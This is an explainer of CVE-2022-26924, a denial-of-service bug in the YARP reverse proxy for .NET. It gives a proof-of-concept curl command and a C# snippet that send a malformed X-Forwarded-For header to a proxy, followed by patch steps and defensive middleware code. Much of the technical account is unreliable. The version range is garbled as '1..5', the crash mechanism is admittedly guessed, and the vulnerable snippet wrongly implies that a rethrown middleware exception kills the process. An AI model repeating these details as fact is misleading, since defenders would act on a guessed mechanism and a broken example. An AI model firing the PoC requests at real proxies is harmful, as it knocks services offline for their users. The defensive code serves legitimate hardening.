CVE-2022-26924 - YARP Denial of Service Vulnerability Explained

In April 2022, Microsoft published an advisory (MSRC CVE-2022-26924) about a Denial of Service (DoS) vulnerability in YARP—the “Yet Another Reverse Proxy” library for .NET. If you’re using YARP to route traffic in your web services, this bug could let a remote attacker crash your entire proxy by sending a specially crafted HTTP request.

This post demystifies the bug, shows a proof-of-concept exploit, and gives plain English recommendations for patching your system. We’ll include references, code snippets, and practical advice—all in plain American English.

What Is YARP?

YARP (Yet Another Reverse Proxy) is a Microsoft open-source library designed to let you build reverse proxies in C#/.NET with ease. Many web apps use it to balance loads and route client requests to backend services.

If an attacker can bring down YARP, your clients can’t reach your services. That’s why DoS risks in proxies are particularly sensitive.

The Vulnerability in Simple Terms

CVE-2022-26924 affects YARP versions prior to 1.1.2 and 1..5. The bug is in how YARP handles certain kinds of HTTP requests. Attackers can crash the YARP process by sending a specially crafted HTTP request that the library mishandles—triggering an unhandled exception and a service outage.

In short:

1. An untrusted client sends a malformed request.
2. YARP doesn’t handle it gracefully.
3. The proxy process crashes.
4. The service is down for everyone until you restart it.

Official References & Details

- Microsoft Security Advisory
- NVD: CVE-2022-26924 Details
- YARP GitHub Issue #1654
- YARP Release Notes v1.1.2

Vulnerable Code Pattern

The actual vulnerable code is in YARP’s request-handling pipeline, specifically where it parses headers and routes traffic. When given unexpected or malformed input, the parsing code throws an exception that YARP does not catch at every layer, so the exception escapes and the process crashes.

*Here’s a simplified code snippet (not the full vulnerable code but similar to the affected logic):*

```csharp
using System;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Http;

public async Task InvokeAsync(HttpContext context)
{
    try
    {
        // ...parse incoming HTTP request...
        // StringValues converts to null when the header is absent.
        string headerValue = context.Request.Headers["Some-Header"];
        // Vulnerable: doesn't check the input and assumes the header is always present and well-formed.
        var parts = headerValue.Split(','); // Throws NullReferenceException when headerValue is null!
        // ...use parts...
    }
    catch (Exception)
    {
        // Rethrow or let it crash: the process will terminate
        throw;
    }
}
```

Comment: If headerValue is null or invalid, an exception is thrown. In the real exploit, something similar happens with request headers or bodies triggering an unhandled parsing error, crashing the proxy.

Exploit Details: Proof-of-Concept (PoC)

While Microsoft didn’t release full details, researchers and users discovered that you could trigger the DoS by sending requests with malformed headers or badly formatted values that caused parser errors.

Here’s a simplified PoC with curl:

```bash
# Send a request with an invalid 'X-Forwarded-For' header (replace URL/port)
curl -H "X-Forwarded-For: ,,,badheader" http://your-yarp-proxy:port/
```

If your YARP proxy is vulnerable and handling the header unexpectedly, this may crash the process, depending on the configuration.

C# Example to Automate the Request

```csharp
using System.Net.Http;

// Top-level statements (.NET 6 or later); the proxy address is a placeholder
var client = new HttpClient();
var request = new HttpRequestMessage(HttpMethod.Get, "http://localhost:500");
request.Headers.Add("X-Forwarded-For", ",,,badheader"); // Malformed header
var response = await client.SendAsync(request);
```

How to Fix

1. Update YARP
Upgrade to a patched YARP release using NuGet or your favorite package manager:

```bash
dotnet add package Yarp.ReverseProxy --version 1.1.2
```

2. Restart the Proxy
Make sure to restart your services after updating for the patch to take effect.

3. Defensive Programming
If you’re writing reverse proxies, always validate incoming headers and never assume a header is present or well-formed.
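To make the defensive-programming advice concrete, and to show the hardened counterpart of the vulnerable pattern from the "Vulnerable Code Pattern" section, here is an added example. It is not YARP's own code or a copy of the fix; it is illustrative code that assumes a .NET 6 or later project using the `Microsoft.NET.Sdk.Web` SDK (so `HttpContext` and `StringValues` are available). The class names `SafeHeaderParser` and `HeaderValidationMiddleware` and the limit of 16 entries are my own choices. The parser treats a missing header, empty list elements (such as the `,,,badheader` value from the PoC) and oversized lists as recoverable conditions, and the middleware answers those requests with a 400 instead of letting an exception propagate.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Http;
using Microsoft.Extensions.Primitives;

// Constructed sample inputs (not captured from real traffic); each line prints a verdict.
foreach (var sample in new[] { ",,,badheader", "", "203.0.113.5, 198.51.100.7" })
{
    var ok = SafeHeaderParser.TryParseList(new StringValues(sample), maxEntries: 16, out var entries);
    Console.WriteLine($"{sample,-28} -> {(ok ? "accepted: " + string.Join(" | ", entries) : "rejected")}");
}
// Expected: ",,,badheader" rejected, "" rejected, "203.0.113.5, 198.51.100.7" accepted.

// Hypothetical helper: parses a comma-separated header value like the page's
// snippet does, but never throws on absent or malformed input.
public static class SafeHeaderParser
{
    public static bool TryParseList(StringValues raw, int maxEntries, out IReadOnlyList<string> entries)
    {
        entries = Array.Empty<string>();

        // Absent or empty header: no NullReferenceException, just "nothing to parse".
        if (StringValues.IsNullOrEmpty(raw)) return false;

        // Multiple header lines are joined with commas by ToString(), matching RFC 7230 list syntax.
        var parts = raw.ToString().Split(',', StringSplitOptions.TrimEntries);

        // Empty elements (",,,") and oversized lists are treated as malformed, not as a crash.
        if (parts.Any(string.IsNullOrEmpty) || parts.Length > maxEntries) return false;

        entries = parts;
        return true;
    }
}

// Hypothetical middleware: validates X-Forwarded-For at the edge and rejects only the
// offending request, so one bad client cannot take the proxy down for everyone.
public sealed class HeaderValidationMiddleware
{
    private readonly RequestDelegate _next;

    public HeaderValidationMiddleware(RequestDelegate next) => _next = next;

    public async Task InvokeAsync(HttpContext context)
    {
        if (context.Request.Headers.TryGetValue("X-Forwarded-For", out var raw) &&
            !SafeHeaderParser.TryParseList(raw, maxEntries: 16, out _))
        {
            context.Response.StatusCode = StatusCodes.Status400BadRequest;
            await context.Response.WriteAsync("Malformed X-Forwarded-For header");
            return; // stop here; no exception reaches the rest of the pipeline
        }

        await _next(context);
    }
}
```

Register the middleware with `app.UseMiddleware<HeaderValidationMiddleware>()` before the proxy endpoints so that the header is validated before any routing or transform logic touches it. The design choice worth noting is that the parser reports failure through a return value rather than an exception: that keeps the "is this input acceptable?" decision in ordinary control flow, where it can be logged and counted per client, instead of relying on every upstream layer to catch what a lower layer throws.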

Conclusion

CVE-2022-26924 is a classic denial of service bug in YARP, triggered by an untrusted malformed HTTP header leading to a proxy crash. With proof-of-concept examples as above, it’s easy for attackers to cause downtime for unpatched services.

Further Reading

- Microsoft Blog: YARP Security Advisories
- Upgrading YARP Guide

Timeline

Published on: 04/15/2022 19:15:00 UTC
Last modified on: 04/25/2022 18:33:00 UTC